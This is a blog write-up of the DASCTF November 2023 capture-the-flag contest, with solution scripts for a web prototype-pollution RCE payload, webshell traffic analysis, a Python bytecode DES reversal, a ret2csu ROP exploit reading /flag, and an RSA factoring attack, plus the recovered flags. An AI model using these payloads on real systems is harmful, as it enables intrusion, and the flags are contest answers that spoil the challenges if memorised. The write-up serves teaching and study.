DASCTF十一月挑战赛

Web

realrce

import requests

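# Target instance of the "realrce" challenge (a per-team CTF container).
url = 'http://4d2b8a71-91db-4dbf-b95a-6be4d3505e29.node4.buuoj.cn:81/'

# The JSON body nests a "__proto__" key under "msg". If the server merges
# "msg" into an object without filtering that key, the two properties below
# end up on the shared object prototype (prototype pollution). The server code
# is not shown on this page, so this is inferred from the payload shape.
# Defensive takeaway: reject "__proto__" / "constructor" / "prototype" keys
# before any recursive merge, or merge into a prototype-less object or a Map.
payload = {
    "msg": {
        "__proto__": {
            "cmd_rce": "env",
            "tingshuitingdiandaxue": "%dd"
        }
    }
}

try:
    # An explicit timeout keeps the script from hanging forever when the
    # challenge container is no longer reachable; timeouts are subclasses of
    # RequestException, so they are reported by the handler below.
    response = requests.post(url, json=payload, timeout=10)

    print(response.text)
except requests.exceptions.RequestException as e:
    print(e)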

Misc

IceTea

/www/wwwroot/DAS202310.com/

# (Annotation, not part of the capture.) Commands recovered from the traffic:
# first change into the web root of the site ...
cd "/www/wwwroot/DAS202310.com";

# ... then run the ezbase binary on flag.txt, writing the result to IceTea.txt.
# Presumably "e" selects encode mode and ezbase is the ELF later carved from
# TCP stream 0 -- confirm against the capture.
./ezbase e flag.txt IceTea.txt;

可以看到对flag.txt执行了Base编码操作(严格来说是换表编码,而不是加密)。追踪TCP流,在流0处找到一个ELF文件

dump下来查壳发现有UPX壳,脱壳后即可得到Base64的码表(这应该是出题人设想的预期解)。但实际上我猜测ELF文件已损坏,导致无法直接使用UPX脱壳工具自动脱壳。在HTTP流4中找到密文(蚁剑🐜🗡流量要去掉前两位字符)

IDA打开dump下来的elf文件,查看strings,发现有疑似base表的信息,跟进去看一下

Shift+e看一下

解一下Hex,就可以看到表了,手动去一下干扰字符

https://cyberchef.cn/#recipe=From_Base64('abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ%2B/',true,false)&input=cmVmdHFScmc0UUI5enZaUXp3ZjUweG41MUNaUXhTZjUxZ1pQenhqNXpoakYxQ0k3NXFFPQ

Reverse

ezpython

用010 Editor打开pyc文件,发现key:yuanshen

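# `import importlib` alone does not guarantee that the `util` submodule is
# loaded; import it explicitly so the attribute access below cannot fail.
import importlib.util

# MAGIC_NUMBER describes the bytecode format of the interpreter running this
# snippet, so run it with the same Python version that produced the .pyc
# (3.11 here) to get the header bytes needed for the repair.
print(importlib.util.MAGIC_NUMBER.hex())
#a70d0d0a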

得到Python3.11的Magic Number,用010修复pyc

使用工具反编译

import pyDes

def adjust_length(str):
    """Force *str* to exactly 8 items: right-pad with '0' or cut to the first 8."""
    size = len(str)
    if size > 8:
        # Too long: keep only the leading 8 items.
        return str[:8]
    if size < 8:
        # Too short: pad on the right with the character '0'.
        return str.ljust(8, '0')
    return str


def yuanshen(array, start, end):
Unsupported opcode: JUMP_BACKWARD
    # The line above is decompiler diagnostics, not source: the tool stopped at
    # the first loop (JUMP_BACKWARD is a Python 3.11 opcode), so only the setup
    # of the function survives below.
    # NOTE(review): the dis / tree / parent arrays look like the state of a
    # Dijkstra-style shortest-path search over the weight matrix `array`, from
    # `start` to `end`; the loop body and the return value are not visible
    # here -- confirm against a bytecode disassembly.
    num = len(array)
    # Tentative distance per node, initially "unreachable".
    dis = [
        float('inf')] * num
    # Per-node boolean flag (presumably "already finalised").
    tree = [
        False] * num
    # Per-node predecessor index, -1 meaning "none yet" (presumably).
    parent = [
        -1] * num
    dis[start] = 0
# WARNING: Decompyle incomplete


def qidong(input, key, IV):
    # Encrypt `input` with single DES in CBC mode under `key` and `IV`, using
    # PKCS5 padding (pyDes). Single DES is obsolete (56-bit effective key), and
    # the page shows both key and IV being recovered from the .pyc itself.
    cipher = pyDes.des(key, pyDes.CBC, IV, pad = None, padmode = pyDes.PAD_PKCS5)
    encrypted_data = cipher.encrypt(input)
    # NOTE(review): calling the ciphertext object cannot be what the original
    # bytecode did; this is probably a decompiler artefact for a conversion to
    # a list of integers (main() compares the result with a list of ints) --
    # confirm against the disassembly.
    encrypted_hex_list = encrypted_data()
    return encrypted_hex_list


def main():
    # Decompiled flag checker: reads a key and a flag, derives an IV from a
    # graph search, DES-encrypts the flag and compares it with `data`.
    # Expected ciphertext: 32 integers the encrypted flag is compared against.
    data = [
        159,
        41,
        201,
        125,
        67,
        60,
        44,
        34,
        203,
        56,
        116,
        186,
        13,
        71,
        125,
        30,
        84,
        123,
        109,
        54,
        106,
        56,
        17,
        124,
        87,
        236,
        25,
        12,
        80,
        178,
        165,
        123]
    # NOTE(review): the two prompt strings look mis-decoded (mojibake) in the
    # decompiler output; they are left exactly as emitted.
    key = input('璇疯緭鍏ey: ')
    # The key must be exactly 8 characters, otherwise the program exits.
    if len(key) != 8:
        print('wrong key lenth!')
        exit()
    flag = input('璇疯緭鍏lag: ')
    # 9x9 weight matrix handed to yuanshen(); float('inf') presumably marks
    # "no edge" and the 0 diagonal the distance of a node to itself.
    array = [
        [
            0,
            float('inf'),
            float('inf'),
            1,
            3,
            4,
            float('inf'),
            float('inf'),
            float('inf')],
        [
            float('inf'),
            0,
            float('inf'),
            float('inf'),
            float('inf'),
            2,
            float('inf'),
            4,
            float('inf')],
        [
            float('inf'),
            float('inf'),
            0,
            8,
            1,
            float('inf'),
            float('inf'),
            float('inf'),
            1],
        [
            1,
            float('inf'),
            8,
            0,
            3,
            5,
            1,
            2,
            float('inf')],
        [
            3,
            float('inf'),
            1,
            3,
            0,
            float('inf'),
            1,
            5,
            3],
        [
            4,
            2,
            float('inf'),
            5,
            float('inf'),
            0,
            float('inf'),
            1,
            float('inf')],
        [
            float('inf'),
            float('inf'),
            float('inf'),
            1,
            1,
            float('inf'),
            0,
            float('inf'),
            5],
        [
            float('inf'),
            4,
            float('inf'),
            2,
            5,
            1,
            5,
            0,
            float('inf')],
        [
            float('inf'),
            float('inf'),
            1,
            float('inf'),
            3,
            float('inf'),
            float('inf'),
            float('inf'),
            0]]
    # Graph search from node 1 to node 8 over the matrix above.
    t = yuanshen(array, 1, 8)
    # The decompiler gave up on the next expression (RETURN_GENERATOR belongs
    # to a generator expression in 3.11); the three lines below are tool
    # output, not valid Python. NOTE(review): presumably the IV string is
    # built from the items of `t` -- confirm against the disassembly.
    IV = (lambda .0: Unsupported opcode: RETURN_GENERATOR
    pass# WARNING: Decompyle incomplete
    )(t())
    # Pad or truncate the derived IV to 8 characters.
    IV = adjust_length(IV)
    # Encrypt the entered flag and compare it with the embedded ciphertext.
    check = qidong(flag, key, IV)
    if check == data:
        print('yes,yes,yes!!')
        return None
    # NOTE(review): a bare ''.join(...) has no effect; this is most likely the
    # decompiler's rendering of the failure-message branch.
    ''.join('bad,bad,bad!!')

# The decompiled module calls main() unconditionally when it is loaded.
main()

借助GPT分析可知yuanshen是最短路径算法:yuanshen(array, 1, 8)求节点1到节点8的最短路径。根据array数组可以手工验证,最短路径为1→5→7→3→6→4→2→8(总权重为9),按顺序拼接节点编号即得到iv=15736428,最后解DES

from Crypto.Cipher import DES
from Crypto.Util.Padding import unpad

def decrypt_des_cbc(ciphertext, key, iv):
    """Decrypt a DES-CBC ciphertext and return the unpadded plaintext as text.

    ciphertext is an iterable of byte values; key and iv are strings that are
    encoded to bytes before use. Single DES is obsolete, and in this challenge
    the key sat in the .pyc and the IV was derived deterministically, so the
    ciphertext gave the flag no real protection.
    """
    des = DES.new(key.encode(), DES.MODE_CBC, iv.encode())
    raw = bytes(ciphertext)
    padded = des.decrypt(raw)
    # Strip the block padding before decoding to text.
    plain = unpad(padded, DES.block_size)
    return plain.decode()

# Expected ciphertext copied from the decompiled main(): 32 bytes, shown here
# as four rows of 8 (one DES block per row).
data = [
    159, 41, 201, 125, 67, 60, 44, 34,
    203, 56, 116, 186, 13, 71, 125, 30,
    84, 123, 109, 54, 106, 56, 17, 124,
    87, 236, 25, 12, 80, 178, 165, 123,
]

# key: the string found inside the .pyc; iv: the node sequence obtained from
# the shortest-path step of the checker.
key, iv = "yuanshen", "15736428"

flag = decrypt_des_cbc(data, key, iv)
print(flag)

#DASCTF{D0_U_4ls0_l1k3_7uansH3n}

Pwn

asadstory

利用ret2csu:把close的GOT表项的最低一个字节改成\x15,使其指向syscall指令;然后用read的返回值控制rax,并用openat代替open

from pwn import *

# 64-bit x86 target.
context.arch = 'amd64'
# libc is loaded here but not referenced anywhere else in this script.
libc = ELF('./libc-2.31.so')
elf = ELF('./challenge')

# Local run kept for reference; the script talks to the remote instance.
# p = process("./challenge")
p = remote("node4.buuoj.cn", 28133)

def elf_base():
    """Return the load base of the challenge binary from an address it prints.

    Answers the first two prompts with "1", reads the 12 hex digits that follow
    "0x", and subtracts 0x1249 (the offset of the leaked address inside this
    particular build).
    """
    for _ in range(2):
        p.sendlineafter(b': ', b'1')
    p.recvuntil(b'0x')
    leaked = int(p.recv(12), 16)
    return leaked - 0x1249

# Rebase the ELF symbols on the leaked load address; every address below is
# computed relative to elf.address.
elf.address = elf_base()
print("elf-->" + hex(elf.address))

# Offsets of the two gadgets used for ret2csu in this particular challenge
# build. NOTE(review): presumably csu2 is the register-pop tail and csu1 the
# "move arguments, call through pointer" part -- the disassembly is not shown.
csu1 = elf.address + 0x1620
csu2 = elf.address + 0x163a

# Filler up to the saved return address.
offset = b'a' * 0x38

# Craft the ROP chain
# Each "csu2, 0, 1, a, b, c, slot" row presumably results in a call through
# the GOT entry `slot` with (a, b, c) as arguments; the seven zeros after csu1
# refill the stack slots consumed once that call returns.
# Hardening notes: the chain depends on a writable GOT (Full RELRO would make
# the one-byte patch of close's entry fail), and on openat being reachable
# where open is not (per the write-up) -- a syscall filter should be an
# allowlist rather than a denylist of individual calls.
rop_chain = [
    # read(0, &GOT[close], 1): patch the lowest byte of close's GOT entry.
    csu2, 0, 1, 0, elf.got['close'], 1, elf.got['read'],
    csu1, 0, 0, 0, 0, 0, 0, 0,
    # read(0, buf, 257): stores the path in buf; the byte count comes back in rax.
    csu2, 0, 1, 0, elf.address + 0x4280, 257, elf.got['read'],
    csu1, 0, 0, 0, 0, 0, 0, 0,
    # Call through the patched close entry with (0, buf, 0).
    csu2, 0, 1, 0, elf.address + 0x4280, 0, elf.got['close'],
    csu1, 0, 0, 0, 0, 0, 0, 0,
    # read(1, buf, 0x30). NOTE(review): fd 1 suggests the opened file received
    # descriptor 1 -- not verifiable from this page.
    csu2, 0, 1, 1, elf.address + 0x4280, 0x30, elf.got['read'],
    csu1, 0, 0, 0, 0, 0, 0, 0,
    # read(0, buf + 0x30, 1): a one-byte read, so the return value is 1.
    csu2, 0, 1, 0, elf.address + 0x4280 + 0x30, 1, elf.got['read'],
    csu1, 0, 0, 0, 0, 0, 0, 0,
    # Call through the patched close entry with (2, buf, 0x30).
    csu2, 0, 1, 2, elf.address + 0x4280, 0x30, elf.got['close'],
    csu1
]


# Serialise every chain entry as a little-endian 64-bit value.
payload = b''.join([p64(addr) for addr in rop_chain])


# Menu option 2 takes the oversized input (presumably the overflow path).
p.sendline(b'2')
p.sendline(offset + payload)
# The single byte consumed by the first read in the chain.
p.send(b'\x15')
# Exactly 257 bytes: the path string plus NUL filler.
p.send(b'/flag' + b'\x00' * (257 - 5))
# One byte for the one-byte read.
p.send(b'\x00' * 1)
p.interactive()

Crypto

GeneratePrime

from Crypto.Util.number import *

n=43090231453250894711427929679917165532091051269639380881822679198388872373018031295429558758883298138388596507242928145888959963579111847255588834248367032580980272245414738073179172684104908272069503607376171584936239696444309039211273376010193165083254209608051430794825261116490356392215410064858020176711199543381037420111454942356936721487016187240237683725310306748046587503625096246489043270381153251813360521583717685413070481576320194446237522118380283335294528606720928637529817170809666802598938788405154468683850385277659812316577873886708164549255359514776884765904417881419804464020855420288884972204146588152412816874161445668955639456202226751519881834234916642218078966066353317917939418964763844067220460513388433020071277477619189495465483910271310025371745344364984826481983188861624474015117761898377237745775289039922285111681410319016537270412509750339539020876501534842403407208957382830000761065368861209033791387480377889838737241326116532852335478193204425626487166234964754732945953080086117315162916374952094149599597509405176646068341218684523765974759907645226607364627690026025662221036766148813918691578120023886400197652148214238256715089883892069133754778609710846757189987335827693169644541734443763194942694587436469448973201513131503797898892822373949177030567791519349220158287318717788746060997955057747930375117780320371517616412423571775682868481089431670802944047375824503353609019686495670630728618082254293585479431369645935654024149490741245953271830453426444847467908952699660750809490650479987
e=65537
c=30862228874892553476569860337345503267926249096036551213683005116620750680365154103242717714230966827288361499342464202425467642950081816675486231250411347472976482409360391136808439034217688010072648722396312121758844966972323513456884732046270240934002095706243044210312663525491282667971502534420245427643076262414036655243117610886157895994101178663474990136516153062956803591842233732498519246731337518545018734984319536536205092573418457928952414660837594265802406473201400259189950484841504227372735345451459452313825309333631615286962304963039625162366186574440146535361888708570569938418676320446653266676364765870547213167058713058609788316647593834008151805692510044158607162858906528913516242904419457446211348504248317409844426309455978985314882123424453618672960876022996245213882467954521212481418830104602302179759479012618982228223244131619557639469872139485197176384683400796204681045965981417650462297978265085323342772310690638049411549216990505001950512428646871875659468885490055363436412364532718888124906227240501145227269727887236864060558999336443165765870556727793253297515155026234234422303238380776900105115890363548589834345888430695886678231459920101695996112312269637459823479947618045447071359886515163416153117176539752947700226596291435270282598638974889205601333097978743387412651687356072223691445472690647184292120882095587563356691450107194982597794937293154289560470269606300576216128045797481404606810315677962659136641943747123985144899464108823536597185386155005111274476874957827391438859327653936
k = 5

# SageMath code (Zmod, ZZ, gcd, and `^` as exponentiation), not plain Python.
# Polynomial ring in x over the integers modulo n.
R = Zmod(n)["x"]
while True:
    # Quotient of that ring by a random polynomial of degree k.
    Q = R.quo(R.random_element(k))
    # Raise a random element of the quotient to the n-th power and take the
    # gcd of its x^1 coefficient with n.
    # NOTE(review): presumably this works because qq = 1 + pp + ... + pp^(k-1)
    # divides pp^k - 1, so that whenever the random modulus is irreducible
    # mod pp the n-th power lands in the base field and its non-constant
    # coefficients vanish mod pp -- the generator script is not on this page.
    pp = gcd(ZZ(list(Q.random_element() ^ n)[1]), n)
    if pp != 1:
        # Second factor is fully determined by the first: 1 + pp + ... + pp^(k-1).
        qq = sum([pp**i for i in range(k)])
        # Whatever is left of n after removing pp and qq.
        rr = n // (pp * qq)
        # Confirms the assumed structure n = pp * qq * rr before continuing.
        # NOTE(review): a gcd equal to n itself would also pass `pp != 1` and
        # then trip this assert instead of retrying.
        assert n == pp * qq * rr
        break
# Standard RSA decryption once all three factors are known.
# Takeaway for key generation: factors tied together by a known algebraic
# relation make the modulus factorable; primes must be chosen independently.
phi = (pp - 1) * (qq - 1) * (rr - 1)
d = pow(e, -1, phi)
m = pow(c, d, n)
print(long_to_bytes(int(m)))

#DASCTF{just_a_very_very_easy_task_with_your_talent_is_not}

DASCTF十一月挑战赛
https://g1at.github.io/2023/11/25/DASCTF十一月挑战赛/
作者
g0at
发布于
2023年11月25日
许可协议